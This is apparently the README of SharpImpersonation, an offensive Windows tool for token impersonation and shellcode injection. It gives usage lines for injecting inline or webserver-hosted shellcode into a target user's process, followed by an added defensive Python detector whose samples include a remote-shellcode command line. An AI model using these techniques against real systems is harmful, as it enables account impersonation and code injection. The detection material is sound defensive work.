SharpImpersonation is a user impersonation tool that works via token or shellcode injection. This was a learning-by-doing project from my side. Well-known techniques are used to build just another impersonation tool, with some improvements in comparison to other public tools. The code base was taken from:
- https://github.com/0xbadjuju/Tokenvator
A blog post for the introduction can be found here:
- https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/
List user processes
List only elevated processes
PS C:\temp> SharpImpersonation.exe list elevated
Impersonate the first process of the target user to start a new binary
PS C:\temp> SharpImpersonation.exe user: binary:
Inject base64 encoded shellcode into the first process of the target user
PS C:\temp> SharpImpersonation.exe user: shellcode:
Inject shellcode loaded from a webserver into the first process of the target user
PS C:\temp> SharpImpersonation.exe user: shellcode:
Impersonate the target user via ImpersonateLoggedOnuser for the current session
PS C:\temp> SharpImpersonation.exe user: technique:ImpersonateLoggedOnuser
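
For defenders, the argument syntax shown above can be matched in process-creation telemetry (the CommandLine field of Sysmon Event ID 1 or Security Event 4688) regardless of what the executable is named. The following is an added example, not part of the SharpImpersonation project; the sample command lines, account names and labels are constructed, and treating an http(s) value as the webserver case is an assumption.

```python
import re

# Argument grammar taken from the usage lines above. The executable name is
# ignored because it is trivially renamed; only the key:value arguments count.
ARG = re.compile(r'(?<!\S)(user|binary|shellcode|technique):("[^"]*"|\S*)', re.I)
IMAGE = re.compile(r'\s*(?:"[^"]*"|\S+)\s*(.*)', re.S)  # strips the image path

def classify(cmdline):
    """Return a finding label for one process command line, or None."""
    m = IMAGE.match(cmdline)
    args = {k.lower(): v.strip('"') for k, v in ARG.findall(m.group(1) if m else "")}
    if "user" not in args:
        return None  # every impersonation/injection form on the page names a user
    if "shellcode" in args:
        # Assumption: a webserver-hosted payload is passed as an http(s) URL.
        remote = args["shellcode"].lower().startswith(("http://", "https://"))
        return "shellcode-injection-remote" if remote else "shellcode-injection-inline"
    if "binary" in args:
        return "impersonated-process-start"
    if args.get("technique", "").lower() == "impersonateloggedonuser":
        return "impersonate-current-session"
    return None  # user: alone is too generic to alert on

def scan(cmdlines):
    """Return (label, cmdline) for every command line that matches."""
    return [(label, c) for c in cmdlines if (label := classify(c))]

# Constructed sample command lines (accounts, paths and values are made up).
SAMPLES = [
    r'C:\temp\SharpImpersonation.exe user:CORP\alice binary:cmd.exe',
    r'"C:\Users\Public\svc host.exe" user:CORP\alice shellcode:QUJDRA==',
    r'C:\temp\upd.exe USER:CORP\alice Shellcode:https://files.example.invalid/a.bin',
    r'C:\temp\upd.exe user:CORP\alice technique:ImpersonateLoggedOnuser',
    r'C:\Windows\System32\net.exe user alice /domain',
    r'C:\tools\backup.exe user:alice target:D:\archive',
]

if __name__ == "__main__":
    for label, line in scan(SAMPLES):
        print(f"{label:32} {line}")
```

Command-line matching only catches direct execution with these arguments, so it works best alongside telemetry on token duplication and cross-process memory writes.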